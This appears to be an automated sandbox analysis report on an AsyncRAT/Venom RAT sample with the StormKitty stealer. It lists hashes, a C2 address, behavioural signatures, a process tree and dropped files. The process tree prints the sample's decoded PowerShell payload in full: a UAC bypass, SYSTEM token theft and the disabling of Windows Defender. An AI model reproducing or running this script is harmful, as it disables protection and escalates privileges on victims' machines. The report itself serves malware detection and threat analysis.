Analysis

  • max time kernel
    93s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 14:47

General

  • Target

    4664-96-0x00000000007F0000-0x0000000000C52000-memory.exe

  • Size

    4.4MB

  • MD5

    2f697edf39b22438ed6fcd0520b1de17

  • SHA1

    57232e2845bc5b3c33318c9b7be5e85a6b539a56

  • SHA256

    49cbe5413bbeeb0d715ddb61e692deb0294bd802d2044c4c1e51fe933d7d73e0

  • SHA512

    65a3df2a559151fad437ac2eb4482cb0f754de2d4c818099b9075f99545b11bd49956e4c660d23d061043cea2686438f1a82d1b5770874beacd8c0c6d85d0300

  • SSDEEP

    98304:0qO6xqDspu86X5jWOFWOcg0i9/COjIhkMfzhhMf:QfpSBHi1Dj2h

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 46 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4664-96-0x00000000007F0000-0x0000000000C52000-memory.exe
    "C:\Users\Admin\AppData\Local\Temp\4664-96-0x00000000007F0000-0x0000000000C52000-memory.exe"
    1⤵
    • Checks computer location settings
    • Accesses Microsoft Outlook profiles
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • outlook_office_path
    • outlook_win_path
    PID:3468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
      2⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3208
      • C:\Windows\system32\sc.exe
        "C:\Windows\system32\sc.exe" qc windefend
        3⤵
        • Launches sc.exe
        PID:2804
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        3⤵
          PID:2996
        • C:\Windows\system32\whoami.exe
          "C:\Windows\system32\whoami.exe" /groups
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3028
        • C:\Windows\system32\net1.exe
          "C:\Windows\system32\net1.exe" start TrustedInstaller
          3⤵
            PID:4668
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          2⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2432
          • C:\Windows\system32\chcp.com
            chcp 65001
            3⤵
              PID:1528
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              3⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:1388
            • C:\Windows\system32\findstr.exe
              findstr All
              3⤵
                PID:2304
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4424
              • C:\Windows\system32\chcp.com
                chcp 65001
                3⤵
                  PID:1920
                • C:\Windows\system32\netsh.exe
                  netsh wlan show networks mode=bssid
                  3⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3640
            • C:\Windows\servicing\TrustedInstaller.exe
              C:\Windows\servicing\TrustedInstaller.exe
              1⤵
                PID:4972
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                  2⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • Command and Scripting Interpreter: PowerShell
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:556
                  • C:\Windows\system32\sc.exe
                    "C:\Windows\system32\sc.exe" qc windefend
                    3⤵
                    • Launches sc.exe
                    PID:756
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                    3⤵
                      PID:1228
                    • C:\Windows\system32\whoami.exe
                      "C:\Windows\system32\whoami.exe" /groups
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3536
                    • C:\Windows\system32\net1.exe
                      "C:\Windows\system32\net1.exe" stop windefend
                      3⤵
                        PID:4344
                      • C:\Windows\system32\sc.exe
                        "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                        3⤵
                        • Launches sc.exe
                        PID:3132

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\Admin@HGNBWBGW_en-US\System\Process.txt

                    Filesize

                    848B

                    MD5

                    813c51673eeb84828e0dcf890b42b73e

                    SHA1

                    1fcda8d66c223c2c0bb1b162664c83722798cc93

                    SHA256

                    12b1ac2a85dad7eaf4a80d5d5018d1b23c4ac2d5f5bdc3791d8779bb3cbdfaf5

                    SHA512

                    e9769f4d27ea449c14b23134da4f213815fd2c99b064e59704042c1f36e1e13a8d0642332f7f0bb899022eb4a580a376e2f5dbdba4e929b76f143f0e2f8d4401

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\Admin@HGNBWBGW_en-US\System\Process.txt

                    Filesize

                    2KB

                    MD5

                    6e6de0e504a280959d8066eabba84c59

                    SHA1

                    9cd60b63d2ed9c0625d7088de0e3202a21693de0

                    SHA256

                    b4b284c86b01817dceca7b961b85c08bc520db3b9de247c9d44da00089203f35

                    SHA512

                    2b5e82853c5471277abbf70c78e47066dc5d4ae57bc9d84e78df34189c1278563e4bd5c4dfeedf8d46e1bc50b30535ef5fefd9438c93ee9918ae8e29f52de8d7

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\Admin@HGNBWBGW_en-US\System\Process.txt

                    Filesize

                    2KB

                    MD5

                    f43de5b605f54ac95c8a610cbb7766f9

                    SHA1

                    cb83d17598a720aba0c4ed7926a3ea84e46a333f

                    SHA256

                    6ce18e41585d6b9682437362cc2ed669d45bf5431881128f2b7aeb8e9b602530

                    SHA512

                    b2c800d0fe9021c61769fe3c21c6e533680e4804e8b84efd82625fd49440b6de7aacf95b9c7558feb9c6451d5052d1b454cd554fbd2fe9dfaa85cc6970453215

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\Admin@HGNBWBGW_en-US\System\Process.txt

                    Filesize

                    3KB

                    MD5

                    f42aa6655d8a03c0f0136d6397ead051

                    SHA1

                    f3644ddd5ea9ab5a4f4ab7e2a30f2b2aa574bfc3

                    SHA256

                    4cc496e858a16e84eba110f819ce6fdc13dfdfb85b7a1f9b378b8f3b9b58a85e

                    SHA512

                    6a5f5ef9b3b27e371a080ecbefc57a25af47b4469580b1d4dd338572f9decc3619ddbc20f45e00baaead7a8fa2acd11060af26a98f850910336e8a40a86d512a

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\Admin@HGNBWBGW_en-US\System\Process.txt

                    Filesize

                    3KB

                    MD5

                    8b08cc250b8de72b933877e02052cc15

                    SHA1

                    b0a1fff6263975d5a884eb40f9c7f13899e4d797

                    SHA256

                    0577e4bb6d086e9078c69f8b626e6886791545e7e0506851fbf68b90010f5616

                    SHA512

                    a582b5f271a808d98b5bbf5f62cb8b3404d7075991c40ad1c27d99b738a890eabd8f7c69aaa25a407f00ef10e5b11f51ecbbb5c363c9d52e6f5a9da902894991

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\Admin@HGNBWBGW_en-US\System\Process.txt

                    Filesize

                    5KB

                    MD5

                    fb74ce221eec03e56b61bf66a0a72420

                    SHA1

                    9c12b087318db897556496bb4ba77322c06614c4

                    SHA256

                    b8d987a9ff1de6424662fcb0248d7f208e502646508c53fde2049302bcca60be

                    SHA512

                    66c3813b88b2aea367901eeb937179a840bf342284a8afdb92ea1c28eaa31b98100c48fc8d05a6c8753462eb4bf927ac4c953817ab3f83b9aa248109468edb4e

                  • C:\Users\Admin\AppData\Local\87822bb7011c0dee28ef5deeaaeefa65\msgid.dat

                    Filesize

                    1B

                    MD5

                    cfcd208495d565ef66e7dff9f98764da

                    SHA1

                    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                    SHA256

                    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                    SHA512

                    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    3KB

                    MD5

                    556084f2c6d459c116a69d6fedcc4105

                    SHA1

                    633e89b9a1e77942d822d14de6708430a3944dbc

                    SHA256

                    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                    SHA512

                    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    ac3bf9756600f6c31a15240716e6e7c6

                    SHA1

                    521aa76b55f74cafd1b579933dc0fae439acb0f5

                    SHA256

                    f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

                    SHA512

                    96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rslxymp1.skv.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\tmpE75F.tmp.dat

                    Filesize

                    114KB

                    MD5

                    0163d73ac6c04817a0bed83c3564b99f

                    SHA1

                    784001e8d0e7ab6a09202c2a1094f371f7d017cb

                    SHA256

                    5114af822abc2b0f2aabb7565919164c9babf884e34c21095213dbe6a71511ea

                    SHA512

                    47051ee935be9e9d4457447c7fe5df06a5b0c5ef55d2c757d3dfa179b6049ae79732b1552e812febe5ae41a076cb29d8a809ae9b168afc7eb4c9eadfadcf5d9b

                  • C:\Users\Admin\AppData\Local\Temp\tmpE762.tmp.dat

                    Filesize

                    160KB

                    MD5

                    f310cf1ff562ae14449e0167a3e1fe46

                    SHA1

                    85c58afa9049467031c6c2b17f5c12ca73bb2788

                    SHA256

                    e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

                    SHA512

                    1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

                  • memory/3208-69-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3208-16-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3208-17-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3208-24-0x000002AA7F5A0000-0x000002AA7F5C2000-memory.dmp

                    Filesize

                    136KB

                  • memory/3468-84-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-18-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-70-0x000000001D800000-0x000000001D934000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/3468-13-0x000000001B6A0000-0x000000001B6BE000-memory.dmp

                    Filesize

                    120KB

                  • memory/3468-72-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-73-0x000000001CA40000-0x000000001CA4A000-memory.dmp

                    Filesize

                    40KB

                  • memory/3468-12-0x0000000002AE0000-0x0000000002AEE000-memory.dmp

                    Filesize

                    56KB

                  • memory/3468-15-0x000000001D1E0000-0x000000001D302000-memory.dmp

                    Filesize

                    1.1MB

                  • memory/3468-0-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

                    Filesize

                    8KB

                  • memory/3468-14-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-11-0x000000001B920000-0x000000001B996000-memory.dmp

                    Filesize

                    472KB

                  • memory/3468-10-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

                    Filesize

                    8KB

                  • memory/3468-9-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-7-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-4-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-3-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3468-198-0x000000001CAC0000-0x000000001CB3A000-memory.dmp

                    Filesize

                    488KB

                  • memory/3468-241-0x000000001D300000-0x000000001D384000-memory.dmp

                    Filesize

                    528KB

                  • memory/3468-1-0x00000000004F0000-0x0000000000952000-memory.dmp

                    Filesize

                    4.4MB